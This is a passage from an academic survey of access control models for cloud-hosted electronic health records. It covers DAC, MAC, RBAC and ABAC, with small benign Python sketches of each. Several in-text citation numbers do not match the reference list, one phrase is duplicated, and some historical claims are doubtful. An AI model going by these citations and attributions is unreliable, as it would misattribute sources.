Integrity can be understood as preserving the initial representation of data even in the case of any alterations [20]. Ensuring integrity is key in EHR systems since it guarantees the accuracy of data, thus minimizing errors and improving the safety of patients. Currently, authorized users can also contribute greatly to inaccuracies if inadequately trained on the use of the system; for instance, the use of the cut-and-paste feature and drop-down menus has been reported as one of the main causes of data inaccuracies in EHR. These operations are performed by physicians who are in a hurry, thus causing data integrity issues [10].

2.3.3 Availability
The system should be accessible anytime it is required by authorized parties and entities, for example in an emergency situation when a specific physician needs access to a patient's record to carry out a diagnosis and approve medication. The system should not be constrained to a specific time of the day; otherwise, the physician's job is made complex since decisions cannot be made in real time as required [15].


3 TRADITIONAL ACCESS CONTROL IN ELECTRONIC HEALTH RECORDS

Information access control is considered the topmost requirement for any healthcare organization implementing EHR in the cloud. Protecting patients' data and the organization's resources from unauthorized disclosure while ensuring the CIA triad is essential under any circumstances [21]. Bill et al. [18] argue that for organizations to achieve these aspects, the adoption of an appropriate access control mechanism is obligatory to enforce security and privacy protection over the company's resources.
A wide variety of traditional access control methods have been implemented by various organizations depending on their structure. The subsections below discuss the different access control models.
3.1 Discretionary Access Control (DAC)
The Trusted Computer System Evaluation Criteria (TCSEC) [21] defines this model as a mechanism that restricts access to an object based on the identity attached to the subject or a group it belongs to. In DAC, subjects can inherit and transfer access rights to each other unless


the restriction is enforced by mandatory access control.
One key advantage of using DAC is that resource owners can specify and manage who can access particular resources; however, this access control design is less secure compared to MAC. Granting and revoking of permissions is achieved through the use of Access Control Lists (ACL) or identity-based access control [2], [21]. This kind of access control design is implemented in most commercial operating systems currently in use, for example Windows-based OS and Unix [22].
EHR systems essentially hold data composed of thousands of clinical documents; these documents have various attributes, such as author, holder and patient, and therefore identifying the owner of a document amidst these variables may be cumbersome. DAC is therefore not a suitable model for a dynamic domain like healthcare [12].
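As a rough illustration of the ACL-based DAC design described above (written in Python purely for illustration; the class and names are hypothetical), each object carries an access control list managed by its owner:

class DacObject:
    def __init__(self, owner):
        self.owner = owner
        self.acl = {}                         # subject -> set of permissions

    def grant(self, granter, subject, permission):
        # In DAC, only the resource owner decides who may access the object.
        if granter == self.owner:
            self.acl.setdefault(subject, set()).add(permission)

    def is_allowed(self, subject, permission):
        return permission in self.acl.get(subject, set())

# Example: a record owner shares read access with another clinician.
record = DacObject(owner="alice")
record.grant("alice", "bob", "read")
print(record.is_allowed("bob", "read"))       # True
print(record.is_allowed("bob", "write"))      # False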
3.2 Mandatory Access Control (MAC)
Mandatory Access Control (MAC) is regarded as a solution for government systems that hold very sensitive information, with labels normally defined as Top-secret (highest), Secret, Confidential and Unclassified (lowest) [2]. The access control model is managed by a centralized authority that grants access decisions to the subjects requesting particular resources, normally referred to as objects [22].
MAC is generally more secure compared to DAC and also follows the paradigm of using labels tagged to information to restrict object access by subjects. To illustrate the point, suppose a particular object is classified as confidential; only the subjects holding clearance level confidential are able to access the specific object, otherwise access is denied. To differentiate MAC from DAC, objects have to be identified and checked to ascertain whether they are associated with ACLs. MAC normally
are associated with ACLs. MAC normally


provides a high level of trustworthiness through the use of security levels referred to as subject clearances. Therefore, an access class is assigned to particular subjects and objects by MAC, which secures how the information flows.
The model has been reported as rigid since it does not take into account dynamic and context-aware constraints, for example location, time and device, among others [12]. Secondly, MAC poses a greater challenge to implement in an environment with decentralized systems. In a nutshell, the model is expensive to implement and fails to support some important principles, for instance separation of duties, inheritance, and least privilege.
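A minimal sketch of the labeling idea described above, with the four labels ordered and read access granted when the subject's clearance dominates the object's classification (a simple no-read-up rule; this is an illustrative Python sketch, not the paper's formal model):

LEVELS = {"Unclassified": 0, "Confidential": 1, "Secret": 2, "Top-secret": 3}

def mac_read_allowed(subject_clearance, object_classification):
    # Central policy: a subject may read an object only if its clearance
    # level is at least as high as the object's classification label.
    return LEVELS[subject_clearance] >= LEVELS[object_classification]

print(mac_read_allowed("Secret", "Confidential"))     # True
print(mac_read_allowed("Confidential", "Secret"))     # False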
3.3 Role-Based Access Control (RBAC)
RBAC came into existence in the early 1970s, when system administrators started having data security issues and challenges as information systems started to serve multiple users along with heterogeneous applications [23]. RBAC provides a natural mechanism to control resources in an organization, which has led to its popularity and adoption by various organizations [21]. The system administrator creates roles that are linked to subjects' functions, grants access rights to the roles, and thereafter assigns the users to the roles according to their responsibilities. [17] identifies three aspects that should be emphasized while dealing with this access control model.
Role assignment - A transaction can only be executed by a subject if and only if a role has been assigned or selected; this aspect allows fine-grained access to the specific resource by authorized subjects. As an example, if Mike has been assigned the role "Doctor", then he is only allowed to access resources and act on them within that scope.
Role authorization - This simply allows users to only take up roles that they have been


authorized, thus maintaining integrity; however, under DAC subjects can inherit privileges, which can lead to privacy and confidentiality violations.
Transaction authorization - A transaction can only be carried out by an authorized subject with an active role. This aspect is considered the basis on which an RBAC system operates.
Resources in an information system need to be protected; these system resources are objects that are stored in the operating system or a database management system [23]. Examples of objects include files, directories, rows, tables and columns, to mention a few. RBAC objects possess permissions, which are assigned to roles. The model has a central component, role relations, which comprises user assignment and permission assignment.

RBAC can be tailored to suit the changing needs of the organization; this is one key benefit of adopting this model. Secondly, it supports the most fundamental security principles, which include the following (a brief illustrative sketch follows this list).
Data abstraction: Abstraction allows the establishment of abstract permissions, for example credit or debit on an account object. Therefore, RBAC eliminates the use of the typical permissions provided by the operating system (read, write, execute).
Separation of Duty: This principle is equally important in RBAC security; it allows mutually exclusive roles to be invoked to complete sensitive tasks. For example, it will require the roles of a doctor and a laboratory technician to diagnose a patient and prescribe drugs.
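A minimal Python sketch of the user-role and role-permission assignments discussed above; the role and permission names are illustrative only:

ROLE_PERMISSIONS = {
    "Doctor": {"view_record", "prescribe"},
    "LabTechnician": {"view_lab_results", "record_lab_results"},
}
USER_ROLES = {"mike": {"Doctor"}}             # user assignment

def rbac_allowed(user, active_role, permission):
    # Transaction authorization: the subject must have activated a role
    # it is authorized for, and the permission must be assigned to that role.
    return (active_role in USER_ROLES.get(user, set())
            and permission in ROLE_PERMISSIONS.get(active_role, set()))

print(rbac_allowed("mike", "Doctor", "prescribe"))            # True
print(rbac_allowed("mike", "Doctor", "record_lab_results"))   # False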
3.4 Attribute-Based Access Control (ABAC)
To fully understand how ABAC works, basic knowledge of how a logical access control mechanism works is key. ABAC operates on logic to protect objects, data, applications and other forms of resources and services [25].
NIST provides an advanced definition of ABAC as an access control method in which subjects requesting to carry out operations on objects are evaluated based on their own attributes, the object attributes, and policies that have been defined on the attributes and conditions. The result of the evaluation is therefore either a grant or a denial of access.
Next, ABAC utilizes a concept of policy management similar to that reflected in ACLs or RBAC. However, in this case, policies can be evaluated based on more than one attribute [25]. Implementations have been made to achieve ABAC with the use of RBAC, although compliance requirements have always been an issue. This is because RBAC extends a high level of abstraction, which makes the demonstration of requirements a costly and complex task.


In a healthcare setting, when a practitioner is employed in the hospital, she will be assigned a set of attributes, for example "Jaya is a nurse practitioner in the cardiology department". She will be assigned permission to the resources that can be invoked by her role. Authorized parties are assigned to policies that have to be evaluated before access to any record is granted, for instance: medical records for heart patients can only be viewed and edited by a nurse attached to the cardiology department. As a result, object owners (patients) create these policies once, regarding who can have access to these medical records.
ABAC provides flexibility in such a way that, if subjects from other hospitals need to access a specific object, they will be assigned attributes rather than roles, thus making it easier for both object owners and other authorities. ABAC provides total flexibility for EHR internal and external users; however, since external parties are assigned access to objects without prior knowledge of the patients, this eventually raises accountability issues, which are

an important factor and requirement of international directives.
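A rough Python sketch of the cardiology example above: the decision compares subject and object attributes against a policy rather than a fixed role-permission table. The attribute names and the single hard-coded policy are illustrative assumptions, not part of the original discussion:

def abac_allowed(subject_attrs, object_attrs, action):
    # Policy: medical records of heart patients may be viewed or edited
    # only by nurse practitioners attached to the cardiology department.
    return (subject_attrs.get("position") == "Nurse practitioner"
            and subject_attrs.get("department") == "cardiology"
            and object_attrs.get("category") == "heart_patient_record"
            and action in {"view", "edit"})

jaya = {"position": "Nurse practitioner", "department": "cardiology"}
record = {"category": "heart_patient_record"}
print(abac_allowed(jaya, record, "edit"))      # True
print(abac_allowed(jaya, record, "delete"))    # False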
4. DISCUSSION
To answer questions regarding how to eliminate unauthorized access in healthcare, different access control mechanisms have been developed and proposed, to be applied depending on the organization and its privacy needs [21]. MAC is a model suitable for military and government organizations. Secondly, DAC is constrained by strict access to resources by authorized subjects and is thus not flexible or fit for healthcare organizations, where flexibility and scalability are a necessity [12].
RBAC deals with the complexity of roles and constraints using the SoD principle, which can also be expressed as relationship-based roles [23]. For flexibility in access control decisions based on user attributes and other environment constraints, ABAC might be the appropriate model [25].
Some of the previously proposed models extending RBAC and ABAC are discussed in this section to find their applicability in cloud-adopted EHR. Traditional access control models [12] that mainly utilize access control lists and roles are not suitable for cloud deployment, since they are rigid and cannot meet the dynamic numbers of users involved in cloud deployments. The cloud requires fine-grained access control that can protect the confidentiality of outsourced data.
A trust context-aware access control model was proposed [27] to utilize a trust level to acknowledge and verify the requestor of a particular resource. With trust computing employed, permissions are dynamically adjusted depending on the user behavior and the associated environment. Therefore, a predictive form of authorization based on context information and the trust level of the requesting subject will allow efficient resource sharing;


however, the model does not support a privacy policy. Similarly, a semantic role-based access control model [28] allows collaboration among the heterogeneous platforms of an organization. The proposed model is generic and can be applied in any enterprise to allow run-time dynamic management and execution of access rights. Similarly, if the user roles change, this does not affect its operations, the same as the access model proposed by [27], though this model utilizes the XACML architecture and roles are based on an OWL ontology. To leverage trust in the cloud, a trusted access control model [29] extends RBAC and the task-based access control model and incorporates a reputation-awarding mechanism that credits the user according to the trust generated over time as per user behavior; the model seems to provide information security on the data but fails to address the calculation of a specific reputation value, which reduces the accuracy level.
ABAC [30]-[31] defines a flexible access control model that allows attributes to be associated with users of the systems; this access control model differs a lot from RBAC in that attribute values are used as determinants for either denying or granting access to objects. Additionally, Nitin and Anupam [32] claim that the ABAC model was designed to overcome the shortcomings of classical access control models (DAC, MAC, and RBAC) and also to leverage security and information sharing. This includes the manual development of RBAC policies, which is costly and difficult [33] compared to ABAC policies. Although combining various access controls may seem inconvenient, Lawrence and Jim [34] argue that in order to keep security levels optimal, MAC can be integrated with ABAC to leverage flexibility in access control decisions vis-à-vis other security attributes that may include subject property, clearance or classification.
A study in [35] extends traditional ABAC to support attribute rules that are used for decisions, and roles are assigned depending on attributes that are linked to tasks which hold permissions. As cloud adoption dominates enterprises,


various authors have proposed mechanisms to protect cloud data [36] based on the encryption of attributes; this model employs a key-policy attribute-based encryption scheme where key generation and decryption are outsourced to a trusted authority. Moreover, with computational tasks being executed over mobile devices and sensors, the number of attributes in the access policy will increase; as a result, a typical Attribute-Based Encryption (ABE) scheme will not be in a position to retain its performance, thus creating a computational overhead.
Nevertheless, a cryptographic access control mechanism [37] has been proposed to facilitate authorization in a semi-trusted environment. The work is expanded based on [36], with the inclusion of a mediated revocation protocol component to address the computation overheads identified in ABE. As the cloud is gaining massive attention from enterprises for adoption, a temporal access control model [38] for cloud data with user revocation has been proposed; the solution is not so different from those of other researchers [36], [37], [39], [40], since all utilize the technique of CBE to protect the outsourced data. However, this proposed model provides an additional component that allows decryption of the data over a specified period of time by only the authorized subjects, with user revocation capabilities. Similarly, an extended access control model [40] uses Ciphertext-Policy Comparative Attribute-Based Encryption on top of ABAC, thereby supporting wildcards and negative attributes. This framework provides efficiency since constant-size keys and ciphertexts are generated irrespective of the attributes involved, thus providing a constant computational cost on lightweight mobile devices.
4.1 Limitations in Cloud Based Models
Various mechanisms to restrict access and protect resources in the cloud have been proposed in these articles [24], [27], [29], [37], [39]-[40]. However, they fail to address security and privacy requirements for EHR conformance


in the cloud; one of the most prevailing requirements in access control, as per HIPAA, is the patient's consent [42]. A hybrid cloud-based EHR system design was proposed in [42] which takes into account privacy and security requirements, for example encryption of data at rest and in motion, notification of the data owner on every access to the patient's information, ultimate confidentiality, availability, and access to records during an emergency situation. However, this design has not been implemented and its feasibility has not yet been established. Additionally, traditional models disregard patients' access to their own medical records, and the exchange of medical records is also too complex [23]-[25], [42]. Some cloud EHR providers in the USA have demonstrated conformance to HIPAA requirements; patients have been granted a right to access a portion of their medical records as identified in the privacy rule. However, the issues of total visibility and accountability regarding who accesses medical records and how are generally still questionable.
5. CONCLUSION
Privacy and security are amongst the most challenging issues faced by the healthcare industry. These issues are mostly addressed by utilizing access control and cryptographic techniques. Patients' need for privacy is vital for EHR success. As a result, various authors have proposed access control models to deal with privacy-related issues. A review of existing access control models reveals that most work presented in the literature extends RBAC in order to provide flexibility and security; however, it does not address access control model requirements such as a patient service to allow patient consent. As a result, the trustworthiness between patients and the EHR system can be improved by incorporating patient consent as an integral EHR component. In a nutshell, to better address the need for patients' privacy in the presence of security issues on the cloud platform, a novel cloud privacy-


centric access control model should be proposed and designed.

REFERENCES
[1] Hoerbst, A. & Ammenwerth, E., 2010. "Electronic Health Records - A Systematic Review on Quality Requirements," Methods Inf Med, Schattauer, Volume 4, pp. 1-16.
[2] Tech Review, M., 2006. "EMR - Health Technology assessment unit," Medical Development Division, Kuala Lumpur: Ministry of Health.
[3] Jurgen, S., Priv, D., Dietrich, K. J. I. & Dr Rer, N. M. B., 2003. "Comparing Paper based with Electronic patients Records: Lessons Learned during a Study on Diagnosis and Procedure Codes," Journal of the American Medical Informatics Association, 10(5), pp. 2-8.
[4] Jibin, J. & Vivek, A., 2010. "Privacy in Electronic Health Records Systems - Consumer's perspective," s.l.: Stockholm University.
[5] M. Lamar, "EHRS in the Cloud," Journal of AHIMA, vol. 82, no. 7, pp. 48-49, 2011.
[6] E. Brian, "HIT Think: How to manage risk with cloud vendors," Health Data Management, 2016.
[7] M. Maslin and R. Ailar, "Cloud Computing Adoption in Healthcare Sector: A SWOT Analysis," Canadian Center of Science and Education, vol. 11, no. 10, pp. 12-18, 2015.
[8] BitGlass, "Healthcare Breach Report 2016," BitGlass Inc., 2016.
[9] ClickCare, 2014. "Healthcare BYOD and HIPAA Security," San Jose: ClickCare LLC.
[10] Edward, H. S., 1999. "The Evolution of Electronic Medical Records," Academic Medicine, 74(4), pp. 414-419.
[11] Ronald, B., John, S. & Robert, K., 2015. "New challenges for Electronic Health Records: Confidentiality and Access to Sensitive Health Information About Parents and Adolescents," The Journal of the American Medical Association, 313(1), pp. 29-30.
[12] Ajit, A. & Eric, M. J., 2010. "Information security and privacy in healthcare: Current state of research," Int. J. Internet and Enterprise Management, 6(4), pp. 279-313.
[13] Experian, "Third Annual Data Breach Industry Forecast," Experian Inc., 2016.
[14] S. Chris and M. Christopher, "Healthcare's IoT Dilemma: Connected Medical Devices," Forrester Research Inc., 2016.
[15] Sicuranza, M. & Ciampi, M., 2014. "A semantic Access Control for easy management of privacy for EHR Systems," IEEE - Advancing Technology for Humanity, pp. 400-405.
[16] unim, B. & Rachid, O. A.-E. B., 2008. "As a human factor, the attitude of healthcare practitioners is the primary step for the e-health - First outcome of an ongoing study in Morocco," Communications of the IBIMA, Volume 3.
[17] "Patients' GP and hospital data to be linked to help plan services," Clinical Pharmacist, 2013.


[18] Ferreira, A., Cruz, C. R. & Antunes, L., 2011. "Usability of authentication and access control: a case study in healthcare," Journal of Informatics.
[19] ISO/TR, 2005. "Health Informatics - Electronic Health Record, Definition, scope and context," s.l.: ISO/TR 20513.
[20] Jose, L. F.-A., Inmaculada, C. S., Pedo, A. O. L. & Ambrosio, T., 2013. "Security and Privacy in electronic health records: A systematic literature review," Journal of Biomedical Informatics, Volume 46, pp. 541-562.
[21] Bill, B., Tricia, B. & Erin, K. B., 2011. "Information Systems Security & Assurance series. In: Access Control, Authentication, and Public Key Infrastructure," Burlington: Jones & Bartlett Learning, pp. 208-211.
[22] Nayer, J., Amit, S. & Praveen, A., 2015. "Ethical issues in electronic health records: A general overview," Perspectives in Clinical Research, 6(2), pp. 73-76.
[23] Pierangela, S. & Sabrina De Capitani, d. V., 2000. "Access Control: Policies, Models, and Mechanisms," Brescia: Universita di Milano.
[24] Younis, A. Y., Kashif, K. & Madjid, M., 2014. "An access control model for cloud computing," Journal of Information Security and Applications, Volume 19, pp. 45-60.
[25] Ravi, S. S., Edward, J. C., Hal, L. F. & Charles, E. Y., 1996. "Role Based Access Control Models," s.l.: Seta Corporation.
[26] Vincent, C. H. et al., 2014. "Guide to Attribute Based Access Control (ABAC) Definition and Considerations," McLean: NIST Special Publication.
[27] Mario, S., Angelo, E. & Mario, C., 2014. "A patient privacy centric access control model for EHR systems," International Journal of Internet and Secured Transactions, 5(2), pp. 163-187.
[28] L. Chen, Q. Zhou, G.-f. Haung and L.-q. Zhang, "A trust Role based context aware access control model," 2014.
[29] K. Aymen and T. Said, "A semantic role-based access control for intra and inter-organization collaboration," Toulouse, 2014.
[30] Y.-q. Fan and Y.-s. Zhang, "Trusted Access Control Model Based on Role and Task in Cloud Computing," Jinan, 2015.
[31] S. Mario, E. Angelo and C. Mario, "An access control model to minimize the data exchange in the information retrieval," Journal of Ambient Intelligence and Humanized Computing, 2015.
[32] C. H. Vincent, D. Richard and F. F. David, "Attribute-Based Access Control," IEEE Computer Society, 2015.
[33] K. S. Nitin and J. Anupam, "Representing Attribute Based Access Control policies in OWL," Laguna Hills, 2016.
[34] X. Zhongyuan and D. S. Scott, "Mining Attribute-Based Access Control Policies," IEEE Transactions on Dependable and Secure Computing, vol. 12, no. 5, pp. 533-545, 2015.
[35] K. Lawrence and A.-F. Jim, "Combining Mandatory and Attribute-based Access Control," 2016.


[36] R. Khaled, Y. Zhu, H. Hongxin and A. Gail-Joon, "AR-ABAC: A new Attribute Based Access Control Model supporting Attribute Rules for Cloud Computing," in 2015 IEEE Conference on Collaboration and Internet Computing, Clemson, 2015.
[37] L. Zhiquan, C. Jialin, Z. Min and F. Dengguo, "Efficiently Attribute-Based Access Control for Mobile Cloud Storage System," in 13th International Conference on Trust, Security and Privacy in Computing and Communications, Beijing, 2014.
[38] G. F. Kathleen and P.-F. Susan, "An Access Control Framework for Semi-trusted Storage Using Attribute-based Encryption with Short Ciphertext and Mediated Revocation," Quezon, 2014.
[39] B. Nihal and R. Sushmita, "Temporal Access Control with User Revocation for Cloud Data," 2014.
[40] F. Somchart and S. Hiroyuki, "An Extended CP-ABE based Access Control Model for Data Outsources in the Cloud," in IEEE 39th Annual International Computers, Software & Applications Conference, 2015.
[41] W. Zhijie, H. Dijiang, Z. Yan, L. Bing and C.-J. Chung, "Efficient Attribute-Based Comparable Data Access Control," IEEE Transactions on Computers, vol. 64, no. 12, pp. 3430-3443, 2015.
[42] H. Vincent, F. F. David, D. K. Richard, N. K. Raghu and L. Yu, "Implementing and Managing Policy Rules in Attribute Based Access Control," Gaithersburg, 2015.
[43] Y. Chen, J. Lu and J. Jan, "A secure EHR system based on hybrid clouds," J. Med. Syst., 36(5), pp. 3375-3384, 2012.
